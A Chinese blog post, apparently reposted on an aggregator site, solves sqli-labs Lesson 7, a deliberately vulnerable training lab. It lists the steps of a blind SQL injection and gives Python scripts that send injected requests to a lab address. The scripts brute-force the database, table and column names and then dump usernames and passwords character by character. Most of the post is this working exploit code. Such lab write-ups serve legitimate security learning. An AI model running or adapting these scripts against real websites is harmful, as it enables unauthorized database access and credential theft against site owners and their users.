美文网首页信息安全
sqli-labs-lesson7

sqli-labs-lesson7

作者: 疯帮主 | 来源:发表于2018-12-01 09:11 被阅读0次

    这个是盲注,也是报错注入,有点绕
    先看看流程吧


    图片.png

    都是成双的,
    第一句:判断有没注入
    第二句:判断当前表有几个字段
    第三句:判断数据库名长度
    第四局:猜数据库名
    第五句:判断语句有没正常执行
    第六句:也是判断数据库名长度
    第七句:判断有几个表
    第八句:判断每个表长度
    第九句:猜表名
    第十句:判断有几个字段
    第十一句:判断每个字段的 长度
    第十二句:猜字段名
    第十三句:有几条数据
    第十四句:每个数据长度
    第十五句:猜数据

    脚本

    当然不可能使用手动咯,

    # 数据库长度
database_length = 0
for _ in range(0,10):
    url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length(database())>{} -- ".format(_)
    response = requests.get(url)
    if "You have an error in your SQL syntax" in response.text:
        print("[+] Databse length is <{}>".format(_))
        database_length = _
        break
    else:
        print("[-] {}".format(_))
    图片.png 
    # 猜数据名
import string
database_name = ""
for _ in range(1, database_length+1):
    for char in string.ascii_lowercase:
        url = "http://192.168.154.131/sqli/Less-7/?id=1')) and substr(database(),{},1)>'{}' -- ".format(_, char)
        response = requests.get(url)
        if "You have an error in your SQL syntax" in response.text:
            print("[+] find name is [{}]<{}>".format(_,char))
            database_name += char
            break
        else:
            print("[-] {}".format(char))

print(database_name)
    图片.png 
    # 猜有几个表
tables_count = 0
for _ in range(1,100):
    url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select table_name from information_schema.tables where table_schema='security' limit {},1))>0 -- ".format(_)
    response = requests.get(url)
    if "You have an error in your SQL syntax" in response.text:
        print("[+] table count is <{}>".format(_))
        tables_count = _
        break
    else:
        print("[-] {}".format(_))
    图片.png 
    # 每个表名有多长
tables_length = []
for _ in range(0,tables_count):
    for i in range(0, 100):
        url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select table_name from information_schema.tables where table_schema='{}' limit {},1))>{} -- ".format(database_name,_, i)
        response = requests.get(url)
        if "You have an error in your SQL syntax" in response.text:
            print("[+] [{}]table length is <{}>".format(_,i))
            tables_length.append(i)
            break
        else:
            print("[-] [{}]{}".format(_,i))
    图片.png 
    # 猜表名
tables_name = []
for _ in range(0, tables_count):
    table_name = ""
    for i in range(1, tables_length[_]+1):
        for char in string.ascii_lowercase:
            url = "http://192.168.154.131/sqli/Less-7/?id=1')) and substr((select table_name from information_schema.tables where table_schema='{}' limit {},1), {},1)>'{}' -- ".format(database_name,_,i, char)
            response = requests.get(url)
            if "You have an error in your SQL syntax" in response.text:
                print("[+] [{}][{}]table name is <{}>".format(_,i, char))
                table_name += char
                break
            else:
                print("[-] [{}][{}]{}".format(_,i, char))
    tables_name.append(table_name)
    图片.png 
    # 猜users表有几个字段
columns_count = 0
for _ in range(1,100):
    url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select column_name from information_schema.columns where table_name='{}' limit {},1))>0 -- ".format(tables_name[3], _)
    response = requests.get(url)
    if "You have an error in your SQL syntax" in response.text:
        print("[+] column count is <{}>".format(_))
        columns_count = _
        break
    else:
        print("[-] {}".format(_))
    图片.png 
    # 每个字段名有多长
columns_length = []
for _ in range(0,columns_count):
    for i in range(0, 100):
        url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select column_name from information_schema.columns where table_name='{}' limit {},1))>{} -- ".format(tables_name[3],_, i)
        response = requests.get(url)
        if "You have an error in your SQL syntax" in response.text:
            print("[+] [{}]column length is <{}>".format(_,i))
            columns_length.append(i)
            break
        else:
            print("[-] [{}]{}".format(_,i))
    图片.png 
    # 猜列名
columns_name = []
for _ in range(0, columns_count):
    column_name = ""
    for i in range(1, columns_length[_]+1):
        for char in string.ascii_lowercase:
            url = "http://192.168.154.131/sqli/Less-7/?id=1')) and substr((select column_name from information_schema.columns where table_name='{}' limit {},1), {},1)>'{}' -- ".format(tables_name[3],_,i, char)
            response = requests.get(url)
            if "You have an error in your SQL syntax" in response.text:
                print("[+] [{}][{}]column name is <{}>".format(_,i, char))
                column_name += char
                break
            else:
                print("[-] [{}][{}]{}".format(_,i, char))
    print(column_name)
    columns_name.append(column_name)
    图片.png 
    # 猜有多少记录
row = 0
for _ in range(1,100):
    url = "http://192.168.154.131/sqli/Less-7/?id=1')) and (select count(id) from users)>{} -- ".format(_)
    response = requests.get(url)
    if "You have an error in your SQL syntax" in response.text:
        print("[+] row name is <{}>".format(_))
        row = _
        break
    else:
        print("[-] {}".format(_))
    图片.png 
    # 猜每个数据的长度
username_password_length = []
for _ in range(0, row):
    up = []
    # 用户名的长度
    for ui in range(1,100):
        url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select username from users limit {},1))>={} -- ".format(_,ui)
        response = requests.get(url)
        if "You have an error in your SQL syntax" in response.text:
            print("[+] [{}] username length is <{}>".format(_,ui-1))
            up.append(ui-1)
            break
        else:
            print("[-] [{}] {}".format(_,ui-1))
    # 密码的长度
    for pi in range(1,100):
        url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select password from users limit {},1))>={} -- ".format(_,pi)
        response = requests.get(url)
        if "You have an error in your SQL syntax" in response.text:
            print("[+] [{}] password length is <{}>".format(_,pi-1))
            up.append(pi-1)
            break
        else:
            print("[-] [{}] {}".format(_,pi-1))
    username_password_length.append(up)
username_password_length
    图片.png 
    # 猜数据
data = []
for _ in range(row):
    username = ""
    for ui in range(username_password_length[_][0]):
        for inti in range(33,128):
            url = "http://192.168.154.131/sqli/Less-7/?id=1')) and 1=(select ascii(substr((select username from users limit {},1),{},1))>={}) -- ".format(_,ui+1,inti)
            response = requests.get(url)
            if "You have an error in your SQL syntax" in response.text:
                print("[+] [{}] username[{}]  is <{}>".format(_+1,ui+1, chr(inti-1)))
                username += chr(inti-1)
                break
            else:
                print("[-] [{}][{}] {}".format(_+1,ui+1, chr(inti)))
    print(username)
    password = ""
    for pi in range(username_password_length[_][1]):
        for inti in range(33,128):
            url = "http://192.168.154.131/sqli/Less-7/?id=1')) and 1=(select ascii(substr((select password from users limit {},1),{},1))>={}) -- ".format(_,pi+1,inti)
            response = requests.get(url)
            if "You have an error in your SQL syntax" in response.text:
                print("[+] [{}] password[{}]  is <{}>".format(_+1,pi+1, chr(inti-1)))
                password += chr(inti-1)
                break
            else:
                print("[-] [{}][{}] {}".format(_+1,pi+1, chr(inti)))
    print(password)
    data.append([username, password])
    图片.png

    算是完了,

    可以优化,使用二分法,速度更快

    相关文章

      网友评论

        本文标题:sqli-labs-lesson7

        本文链接:https://www.haomeiwen.com/subject/lnlhcqtx.html

        延伸阅读

        深度阅读

        • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

        栏目导航

        热点阅读

        信息安全

        关于我们|服务条款|联系我们|sqli-labs-lesson7|投稿指南|网站地图|RSS订阅|排版工具|手机版

        提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

        Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

        备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

        本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

        所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!